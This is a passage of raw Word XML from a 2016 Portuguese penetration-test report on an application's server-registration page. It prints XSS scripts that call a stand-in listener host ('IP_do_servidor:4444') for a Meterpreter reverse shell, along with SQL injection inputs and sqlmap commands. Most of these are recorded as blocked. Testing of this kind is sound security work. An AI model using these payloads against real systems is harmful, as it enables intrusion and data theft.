          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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Através do exploit disponível em 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Exploit/Multi/Handler </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com o payload windows-meterpreter-reverse_tcp</w:t>
      </w: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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usar o Metasploit para abrir um listener na porta 444 da máquina virtual que usa o Kali Linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433">
      <w:pPr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Usar um comando GET de Javascript para abrir a conexão entre a máquina que hospeda a aplicação e a máquina virtual que usa Kali na porta indicada.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Dessa forma, será criado um listener que fica ouvindo conexões. Quando ocorre alguma conexão externa, ele executa o payload carregado no momento, que no caso é o windows/meterpreter/reverse_tcp que abre uma conexão reversa da máquina atacada para a máquina atacante.</w:t>
      </w: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O código abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  dotipo GET para IP_do_servidor na porta 4444 de forma assíncrona. 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&lt;script&gt;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 xml:space="preserve">r = </w:t>
      </w:r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new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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest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 xml:space="preserve">(); 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r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET"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,’http://IP_do_servidor:4444’,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="22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6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>.send();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8B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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>script&gt;</w:t>
      </w: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</w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Espera-se que a sessão do meterpreter não seja Aberta.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Resultado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"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O navegador bloqueia a requisição</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> usando o filtro de CORS [6</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75"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tab/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4CA4C8A4" wp14:editId="68B21A6F">
            <wp:extent cx="5400040" cy="1464310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24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Erro exibido no navegador na execução da requisição usando o filtro de CORS.</w:t>
      </w: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Rodar o mesmo script utilizado na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1 em um navegador diferente, para descobrir se o bloqueio da conexão ocorre em qualquer navegador ou apenas no Iceweasel.</w:t>
      </w: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602EF" w:rsidRPr="00F15F82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sessão do meterpreter não seja aberta.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Resultado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"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Ao utilizar o navegador Firefox, o filtro de CORS impede a conexão.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13AD12E2" wp14:editId="71BA138F">
            <wp:extent cx="5400040" cy="1464310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25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Navegador Firefox impede a conexão quando o filtro de CORS é utilizado.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Tela Cadastro Servidor – Exploração via SQL Injection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Tarefa realizada dia 26/04/16.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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página Cadastro Servidor na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 forçar ações não autorizadas no sistema.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Verificar se o campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” é vulnerável a injeção de código SQL fazendo uso da técnica de concatenação de aspas simples.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Entrada: teste ‘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”.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2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Inserir um texto com uma distribuição adequada de aspa simples e comentários inline como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao nome de usuários cadastrados. Comentários inline foram utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.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Entradas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teste ‘ or 1=1 --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teste ‘ or 1=1  #</w:t>
      </w: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Espera-se que o sistema realize o tratamento dos caracteres para impedir que os comentários inline sejam interpretados como parte da consulta.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3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É possível que a tela utilize Javascript para validar os dados informados pelo usuário do sistema no momento do cadastro. Então, para ignorar as possíveis validações existentes, o funcionamento do Javascript foi desabilitado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">no browser em utilização. Após isso foram repetidos os procedimentos das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s 1 e 2.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Entradas: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 xml:space="preserve">teste ‘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teste ‘ or 1=1 --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highlight w:val="yellow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teste ‘ or 1=1 #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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B846D4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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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B846D4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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>. Nada aconteceu. Com o Javascript desabilitado no navegador a página não realizou nenhuma requisição.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4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Com a função de Javascript habilitado no browser, tentar provocar uma falha no momento de cadastro de dados, através da passagem de instruções SQL no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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Entradas: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1231 ); select * from usuarios; --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); select * from usuarios; #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8C6DC7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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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>. Não foi possível descobrir dados de outros servidores cadastrados na base de dados através da instrução de consulta fornecida ao campo “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Entretanto, devido à falta de tratamento adequado para dados inválidos no campo “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” o seguinte erro foi exibido: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b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Erro:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data too long for column ‘id’ at row 1.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Dessa forma foi possível identificar que o campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, no banco de dados corresponde à coluna ‘id’.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softHyphen/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="0048383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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6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Usar a ferramenta Sqlmap para realizar a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de injetar SQL na página.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Primeiro, deve-se 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alvar a requisição POST capturada pela ferramenta Burp Suite em um arquivo a parte para utilizar no Sqlmap posteriormente.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F15F82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sqlmap -r paramsTelaConsServidor -p nome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sqlmap -r paramsTelaConsServidor -p siape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sqlmap -r paramsTelaConsServidor -p cpf --dbms=msql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630433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comando “-r” informa que as instruções do ataque devem ser carregadas no arquivo p</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aramsTelaConsServidor</w:t>
      </w:r>
      <w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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284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“--current-db” comando utilizado para descobrir qual o banco da aplicação alvo.</w:t>
      </w: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F15F82" w:rsidRDefault="000D038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A8D3C47" wp14:editId="674E35D9">
            <wp:extent cx="5400040" cy="16567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27(Editada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E4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26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– Dados da requisição via POST capturada pelo Burp Suite.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ab/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o sistema realize o tratamento sobre os parâmetros.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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Os parâmetros “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nome</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>siape</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” e “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpf</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” não são injetáveis conform</w:t>
      </w:r>
      <w:r w:rsidR="00605CFE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e mostram as figuras 27, 28 e 29</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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E74BFAA" wp14:editId="1FE9C3F0">
            <wp:extent cx="5400040" cy="411543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75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Figura 27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de Injeção SQL no campo </w:t>
      </w:r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.</w:t>
      </w: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60E863B" wp14:editId="5640808A">
            <wp:extent cx="5400040" cy="398653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777DD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Figura 28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de Injeção SQL no campo </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape.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      </w:t>
      </w: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9018AF" wp14:editId="4A0FB04A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9A2041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</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gura 29</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 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Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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de Injeção SQL no campo </w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CPF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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>Iteração 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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5.1 Explorar XSS – Tela Cadastro Servidor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Tarefa realizada dia </w:t>
      </w:r>
      <w:r w:rsidR="00E52417" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19/05/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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>: 1 hora.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Objetivo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Utilizar o campo de “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” para tentar incluir um script malicioso que consiga burlar o filtro CORS e realizar uma chamada a um listener do Mestasploit para executar um ataque usando Meterpreter.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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="0048383A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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Para burlar o filtro CORS, do navegador é necessário que sejam incluídas algumas credenciais no cabeçalho da requisição. O script abaixo simula uma </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de requisição credenciada por meio do atributo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>withCredencials”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>É esperado que a aplicação impeça a conexão.</w:t>
      </w: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52417" w:rsidRPr="00F15F82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lastRenderedPageBreak/>
        <w:t>O código abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  dotipo GET para IP_do_servidor na porta 4444 de forma assíncrona. Porém, aqui é utilizado o atributo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">withCredencials” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para burlar o filtro de CORS do navegador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881DA5" w:rsidRPr="00F15F82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&lt;script&gt;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r = </w:t>
      </w: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new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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest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(); 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r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET"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,’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://IP_do_servidor:4444’,false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);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r.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E1E7FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>withCredentials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 = true;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6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r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.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
